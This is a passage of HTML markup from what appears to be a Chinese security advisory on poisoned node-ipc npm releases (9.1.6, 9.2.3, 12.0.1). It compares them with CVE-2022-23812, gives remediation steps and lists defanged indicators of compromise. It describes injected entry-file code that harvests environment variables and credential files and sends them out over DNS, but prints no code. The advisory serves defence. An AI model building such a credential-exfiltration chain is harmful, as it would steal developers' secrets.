rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">与历史事件对比分析：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">历史 node-ipc 事件(CVE-2022-23812) 主要集中在 10.1.1 到 10.1.2 的破坏性版本，且与本轮样本的发布时间、行为目标存在差异。当前样本属于 2026 年的新一轮投毒发布：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1. 范围锁定 9.1.6、9.2.3、12.0.1；</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2. 行为主线为凭据收集与 DNS 隐蔽外传；</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3. 攻击链更注重低噪声执行与持续外传。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">两者共享部分命名与入口注入特征，但当前样本并未满足归入历史 CVE 的必要边界条件，因此应按“新一轮同源家族变体”而非同一事件处理。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">总结</span></span></h1></b></b></b></b></b></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;" data-pm-slice="0 0 []"><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">本次事件是 </span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">npm 公共生态中一起典型的供应链沦陷案例</span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">。攻击者通过复用真实项目的合法发布路径，精准在 </span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">node-ipc</span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"> 的 </span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">CommonJS 入口文件中注入了恶意投毒逻辑</span><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">，实现了‘无交互、加载即触发’的强隐蔽、高危攻击效果。</span></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">仅污染 CJS 入口，触发面集中在高频链路。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意代码局限在 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc.cjs</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，配合 npm </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">require</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 默认入口规则，攻击直接作用于依赖导入路径。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">三路径分支覆盖多种运行场景。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">分别处理受控进程、直接执行和嵌套依赖场景，能在不同运行环境下激活主流程。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">凭据采集向外传的链路完整且隐蔽。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">采集目标覆盖环境变量、主机指纹与凭证文件，通过 DNS TXT/A/AAAA 分片外传并配合签名材料维护完整性。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">建议:</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1. 检查依赖树中是否存在 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc@9.1.6</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">、</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc@9.2.3</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 或 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc@12.0.1</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，确认后立即降级或替换为可信版本。 </span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.检查构建与运行主机 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">/tmp/nt-&lt;pid&gt;/</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 下是否存在可疑临时压缩痕迹，并核验系统凭据文件访问日志。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3.</span></span><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在网络侧监控 37.16.75[.]69 与 sh.azurestaticprovider[.]net 的异常 DNS 请求，并对高频 TXT/A/AAAA 异常解析行为上线告警机制。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4.对 Node.js 供应链部署增加入口完整性校验，优先检测 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc.cjs</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 和 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc.js</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 双入口是否被篡改。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">5.在告警处置流程中联动应用资产盘点，确认是否存在凭据外流、SSH 授权异常和云凭据密钥被读取的后续风险。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">IOC</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">IP</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">37[.]16[.]75[.]69</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">域名</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">sh.azurestaticprovider[.]net</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">URL</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">https[:]//sh.azurestaticprovider[.]net[:]443</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">恶意依赖</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">npm:node-ipc@9.1.6</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">npm:node-ipc@9.2.3</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">npm:node-ipc@12.0.1</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">恶意文件</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">filename: node-ipc-9.1.6.tgz</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: 